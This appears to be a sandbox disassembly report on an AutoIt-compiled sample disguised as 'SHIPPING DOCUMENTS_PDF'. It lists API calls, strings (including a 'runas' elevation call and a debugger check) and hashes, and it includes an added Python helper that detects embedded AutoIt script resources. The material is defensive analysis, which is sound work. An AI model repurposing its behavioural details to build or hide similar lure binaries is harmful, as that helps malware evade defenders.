[Control-flow graph rendered by the report's interactive graph widget. The extracted node and edge list (node numbers and hexadecimal function addresses) is not readable as text and is omitted here. Win32 API labels visible on the graph nodes: CloseHandle, ReadFile, SetFilePointerEx, SetCurrentDirectoryW, GetStringTypeW, CharUpperBuffW, CharLowerBuffW, DestroyIcon, LoadStringW, Shell_NotifyIconW, GetFileAttributesW, FindFirstFileW, FindClose, GetSystemTimeAsFileTime, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, GetStdHandle, OleInitialize, CreateThread, TerminateProcess, RegisterWindowMessageW, CallWindowProcA, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, DeleteObject, DestroyWindow, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetTempPathW. C-runtime labels: _memmove, _memset, _free, __malloc_crt, __cinit, _wcscpy, _wcscat, _wcscmp, __wcsnicmp, _wcsstr, _strcat, __wsetenvp, __ftell_nolock, __itow, __i64tow, _iswctype. Many nodes also carry the report's "Mailbox" tag. A separate group of nodes in the 9b12a0-9b2f00 address range carries only "GetPEB" labels.]
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                      • Part of subcall function 00B6092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B53C14,00C152F8,?,?,?), ref: 00B6096E
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C07770,00000010), ref: 00B8D281
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00C152F8,?,?,?), ref: 00B8D2B9
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C04260,00C152F8,?,?,?), ref: 00B8D33F
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B8D346
                                                                                      • Part of subcall function 00B53A46: GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                                                      • Part of subcall function 00B53A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(00000063), ref: 00B53A76
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(000000A4), ref: 00B53A88
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                                                      • Part of subcall function 00B53A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                                                      • Part of subcall function 00B53A46: RegisterClassExW.USER32(?), ref: 00B53B16
                                                                                      • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                                                      • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                                                      • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                                                      • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                                                      • Part of subcall function 00B5434A: _memset.LIBCMT ref: 00B54370
                                                                                      • Part of subcall function 00B5434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                                                                    Strings
                                                                                    • runas, xrefs: 00B8D33A
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 00B8D279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 529118366-3287110873
                                                                                    • Opcode ID: 367b2e76a384c410fd6f9c2522c46e13d6e3198899d87bd29ffa8f9fc6aa8dcf
                                                                                    • Instruction ID: f2358336adf61647857a3442c2a1330213cf40bb9ebeca1fb73897be9766e568
                                                                                    • Opcode Fuzzy Hash: 367b2e76a384c410fd6f9c2522c46e13d6e3198899d87bd29ffa8f9fc6aa8dcf
                                                                                    • Instruction Fuzzy Hash: E651D771E48209EADF11EBB4DC55BED7BF4EB46741F0080E6F811A32A1DA705649CB21

                                                                                    Control-flow Graph

                                                                                    [Edge list omitted (legend: Executed / Not Executed): nodes 942-1008 covering blocks b549a0-b54b35 and b8d767-b8d894; calls GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo and internal helpers b57667, b57bcc, b57d2c, b57726, b54b37.]
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00B549CD
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • GetCurrentProcess.KERNEL32(?,00BDFAEC,00000000,00000000,?), ref: 00B54A9A
                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00B54AA1
                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B54AE7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B54AF2
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00B54B23
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00B54B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1986165174-0
                                                                                    • Opcode ID: 803cc04bc12acc17a2b111921a0e5f12c3ac9a6248dd6b322a6dd348ac618f33
                                                                                    • Instruction ID: 13d948d2faf39dfa44346c496186d2508432f5bf0d5d287b6e7a90111d17d41d
                                                                                    • Opcode Fuzzy Hash: 803cc04bc12acc17a2b111921a0e5f12c3ac9a6248dd6b322a6dd348ac618f33
                                                                                    • Instruction Fuzzy Hash: 6991E43198E7C1DEC731DB6894902AAFFF5AF2A305B0449EED4CB93A41D720A94CC759

                                                                                    Control-flow Graph (blocks -> successors; legend: Executed / Not Executed)
                                                                                    • 1009 b54e89-b54ea1 CreateStreamOnHGlobal -> 1010, 1011
                                                                                    • 1010 b54ec1-b54ec6 (no successors)
                                                                                    • 1011 b54ea3-b54eba FindResourceExW -> 1012, 1013
                                                                                    • 1012 b54ec0 -> 1010
                                                                                    • 1013 b8d933-b8d942 LoadResource -> 1012, 1014
                                                                                    • 1014 b8d948-b8d956 SizeofResource -> 1012, 1015
                                                                                    • 1015 b8d95c-b8d967 LockResource -> 1012, 1016
                                                                                    • 1016 b8d96d-b8d98b -> 1012
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54E99
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54EB0
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D937
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D94C
                                                                                    • LockResource.KERNEL32(00B54D8E,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F,00000000), ref: 00B8D95F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                                                                    • Instruction ID: f9c6467a54eea3498d31bc3bf770d0c945514534443778d9f6e6d3d93c6a3b7b
                                                                                    • Opcode Fuzzy Hash: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                                                                    • Instruction Fuzzy Hash: F4119E70200701BFD7258B65EC49F37BBFAFBC5B11F1482ADF80686260EB61E8448A60
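The FindResourceExW call above asks for resource type 0x0A (RT_RCDATA) with the name "SCRIPT", and the LoadResource / SizeofResource / LockResource chain that follows it (next to CreateStreamOnHGlobal) is how the AutoIt3 runtime locates its embedded compiled script. The presence of an RT_RCDATA resource named SCRIPT is therefore a cheap offline check for an AutoIt-compiled stub. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it walks the PE resource tree with the standard library only, and `build_sample_pe()` constructs a minimal PE32 in memory purely to exercise the parser. `AU3_MAGIC` is the marker that public AutoIt unpackers search for ahead of the "AU3!EA06" tag and is an assumption of this example. A hit confirms only the runtime; the script body still has to be extracted and read to see what it drops or injects.

```python
import struct

RT_RCDATA = 10
# Marker public AutoIt unpackers look for ahead of the "AU3!EA06" tag in the SCRIPT
# resource; assumption of this example, treat it as indicative only.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")


def _headers(pe):
    """Return (resource-directory RVA, section table) from the PE headers."""
    nt = struct.unpack_from("<I", pe, 0x3C)[0]                 # e_lfanew
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, nt + 6)[0]
    opt_size = struct.unpack_from("<H", pe, nt + 20)[0]
    opt = nt + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd = opt + (96 if magic == 0x10B else 112)                  # data directories: PE32 vs PE32+
    rsrc_rva = struct.unpack_from("<I", pe, dd + 2 * 8)[0]     # entry 2 = resource table
    sh = opt + opt_size
    # (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section header
    sections = [struct.unpack_from("<IIII", pe, sh + 40 * i + 8) for i in range(nsec)]
    return rsrc_rva, sections


def _rva_to_off(rva, sections):
    for vsize, va, rawsize, rawptr in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    raise ValueError("RVA 0x%x is outside every section" % rva)


def _entries(pe, rsrc_off, rel):
    """Yield (key, is_subdir, rel_off) for each entry of one IMAGE_RESOURCE_DIRECTORY."""
    d = rsrc_off + rel
    n_named, n_id = struct.unpack_from("<HH", pe, d + 12)
    for i in range(n_named + n_id):
        name, data = struct.unpack_from("<II", pe, d + 16 + 8 * i)
        if name & 0x80000000:                                   # high bit: offset to a UTF-16 name
            s = rsrc_off + (name & 0x7FFFFFFF)
            n = struct.unpack_from("<H", pe, s)[0]
            key = pe[s + 2:s + 2 + 2 * n].decode("utf-16-le").upper()
        else:
            key = name                                          # numeric type / ID / language
        yield key, bool(data & 0x80000000), data & 0x7FFFFFFF


def find_rcdata(pe, name):
    """Bytes of the RT_RCDATA resource called `name` (case-insensitive), or None."""
    rsrc_rva, sections = _headers(pe)
    if rsrc_rva == 0:
        return None
    rsrc_off = _rva_to_off(rsrc_rva, sections)
    for key, sub, rel in _entries(pe, rsrc_off, 0):             # level 1: type
        if key != RT_RCDATA or not sub:
            continue
        for key2, sub2, rel2 in _entries(pe, rsrc_off, rel):    # level 2: name / ID
            if key2 != name.upper() or not sub2:
                continue
            for _lang, sub3, rel3 in _entries(pe, rsrc_off, rel2):   # level 3: language
                if not sub3:                                    # IMAGE_RESOURCE_DATA_ENTRY
                    data_rva, size = struct.unpack_from("<II", pe, rsrc_off + rel3)
                    off = _rva_to_off(data_rva, sections)
                    return bytes(pe[off:off + size])
    return None


def autoit_triage(pe):
    """Same lookup the runtime performs (RT_RCDATA + "SCRIPT"), then the AU3 marker."""
    blob = find_rcdata(pe, "SCRIPT")
    return {
        "script_resource": blob is not None,
        "script_size": len(blob) if blob else 0,
        "au3_marker": bool(blob) and AU3_MAGIC in blob[:64],
    }


def build_sample_pe(blob, name="SCRIPT"):
    """Constructed minimal PE32 (not a real sample): one .rsrc section with RT_RCDATA/<name>/0x409 -> blob."""
    rsrc_rva, rsrc_off = 0x1000, 0x200
    def directory(n_named, n_id):
        return struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, n_id)
    s = bytearray()
    s += directory(0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)          # root -> type dir @0x18
    s += directory(1, 0) + struct.pack("<II", 0x80000000 | 0x58, 0x80000000 | 0x30)  # name @0x58 -> lang dir @0x30
    s += directory(0, 1) + struct.pack("<II", 0x0409, 0x48)                          # lang -> data entry @0x48
    s += struct.pack("<IIII", rsrc_rva + 0x80, len(blob), 0, 0)                      # data entry: RVA, size
    s += struct.pack("<H", len(name)) + name.encode("utf-16-le")
    s += b"\0" * (0x80 - len(s)) + blob
    nt = 0x40
    dos = b"MZ" + b"\0" * (nt - 6) + struct.pack("<I", nt)                           # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                            # PE32 magic
    struct.pack_into("<II", opt, 96 + 2 * 8, rsrc_rva, len(s))                       # resource directory
    sec = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(s), rsrc_rva, len(s), rsrc_off, 0, 0, 0, 0, 0x40000040)
    hdr = dos + coff + opt + sec
    return bytes(hdr + b"\0" * (rsrc_off - len(hdr)) + s)
```

Run it on a file with `autoit_triage(open(path, "rb").read())`; the three-level walk (type, name, language) mirrors the arguments the runtime passes to FindResourceExW, so a stub that stores the script under a different name or type, or in an overlay instead of a resource, will not be flagged by this check alone.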
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00B8E398), ref: 00BB446A
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00BB447B
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB448B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                                                                    • Instruction ID: ec07c44c86e87c5da325d1d17042b70774d1bec61969d29a2a6664219b07f6a0
                                                                                    • Opcode Fuzzy Hash: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                                                                    • Instruction Fuzzy Hash: 5EE0D8324155016B42106B38EC4D4F9B79CEE05335F100766F836C21D0FFB459109595
                                                                                    Strings
                                                                                    • Variable must be of type 'Object'., xrefs: 00B93E62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                    • API String ID: 0-109567571
                                                                                    • Opcode ID: 95362c453687eaf20404d28accea306a5eea7ed83f71af438bbaa924c85081a8
                                                                                    • Instruction ID: c73962270b3dc49f4fe5b9f3d542a5e30ff62e523e508ce6c5a4d4e2ab4b60e4
                                                                                    • Opcode Fuzzy Hash: 95362c453687eaf20404d28accea306a5eea7ed83f71af438bbaa924c85081a8
                                                                                    • Instruction Fuzzy Hash: 54A24975A00205CBCB28CF54C480BAAB7F2FB59311F6480E9ED25AB351D775EE4ACB91
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60A5B
                                                                                    • timeGetTime.WINMM ref: 00B60D16
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60E53
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B60E61
                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00B60EFA
                                                                                    • DestroyWindow.USER32 ref: 00B60F06
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60F20
                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00B94E83
                                                                                    • TranslateMessage.USER32(?), ref: 00B95C60
                                                                                    • DispatchMessageW.USER32(?), ref: 00B95C6E
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B95C82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 4212290369-3242690629
                                                                                    • Opcode ID: 7ebea4a31a849b12552440af26827e0c0f98ffb2783e6fac36d33630f0ea43a2
                                                                                    • Instruction ID: 3113808b4cc884c5e4316c7baa4c015fc4087e75e14ff2311b3a452a995ed691
                                                                                    • Opcode Fuzzy Hash: 7ebea4a31a849b12552440af26827e0c0f98ffb2783e6fac36d33630f0ea43a2
                                                                                    • Instruction Fuzzy Hash: 51B2D170608741DFDB35DF24C884BAAB7E4FF85304F1489ADE99A972A1DB74E844CB42

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00BB8F5F: __time64.LIBCMT ref: 00BB8F69
                                                                                      • Part of subcall function 00B54EE5: _fseek.LIBCMT ref: 00B54EFD
                                                                                    • __wsplitpath.LIBCMT ref: 00BB9234
                                                                                      • Part of subcall function 00B740FB: __wsplitpath_helper.LIBCMT ref: 00B7413B
                                                                                    • _wcscpy.LIBCMT ref: 00BB9247
                                                                                    • _wcscat.LIBCMT ref: 00BB925A
                                                                                    • __wsplitpath.LIBCMT ref: 00BB927F
                                                                                    • _wcscat.LIBCMT ref: 00BB9295
                                                                                    • _wcscat.LIBCMT ref: 00BB92A8
                                                                                      • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FDE
                                                                                      • Part of subcall function 00BB8FA5: _memmove.LIBCMT ref: 00BB8FED
                                                                                    • _wcscmp.LIBCMT ref: 00BB91EF
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9824
                                                                                      • Part of subcall function 00BB9734: _wcscmp.LIBCMT ref: 00BB9837
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB9452
                                                                                    • _wcsncpy.LIBCMT ref: 00BB94C5
                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 00BB94FB
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB9511
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9522
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB9534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                    • String ID:
                                                                                    • API String ID: 1500180987-0
                                                                                    • Opcode ID: d7cbcaacc19d818de5c03946fed76c54c86441eafc4c99982048580c6fe75dc3
                                                                                    • Instruction ID: fe89da570ea05df686e9d6f6d1018750074245d132b143f23584ddd579df2b31
                                                                                    • Opcode Fuzzy Hash: d7cbcaacc19d818de5c03946fed76c54c86441eafc4c99982048580c6fe75dc3
                                                                                    • Instruction Fuzzy Hash: ABC129B1D00219ABDF21DFA5CC85AEEB7F9EF55310F0040EAF609E6151EB709A848F65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                                                                    • Instruction ID: f2592dde1d8f4ead1a1041fd1c0a307f7c08d0e98946d9dccf54e014f753dbc9
                                                                                    • Opcode Fuzzy Hash: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                                                                    • Instruction Fuzzy Hash: 1A3105B294520AEFDB10CFA8E884BDDBBF0FB09310F14856AE581A72A0E7B54585CF51

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B530AF
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00B530CC
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B530DC
                                                                                    • LoadIconW.USER32(000000A9), ref: 00B530F2
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B53101
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                                                                    • Instruction ID: 1bc16959a85319d780181f76aca4d913680aa39920246f6309326c14814f60ce
